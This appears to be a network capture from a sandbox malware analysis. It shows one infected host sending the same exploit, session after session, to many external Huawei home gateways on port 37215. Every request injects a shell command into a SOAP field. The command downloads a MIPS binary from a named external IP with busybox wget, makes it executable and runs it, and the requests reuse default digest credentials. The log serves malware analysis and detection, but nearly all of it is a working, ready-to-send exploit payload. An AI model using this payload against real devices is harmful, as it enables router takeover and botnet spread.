                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            633192.168.2.133891041.194.53.24637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.488949060 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            634192.168.2.133609041.43.184.11737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.489622116 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            635192.168.2.1354648156.113.194.15137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.490298986 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            636192.168.2.1347950156.134.197.21437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.491065979 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            637192.168.2.135928841.172.90.18237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.491766930 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            638192.168.2.1346236197.115.124.16437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.492496967 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            639192.168.2.134631041.252.62.7437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.493155003 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            640192.168.2.1335882197.129.137.22037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.494045019 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            641192.168.2.133921241.246.40.16137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.494522095 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            642192.168.2.1351876156.66.48.937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.495196104 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 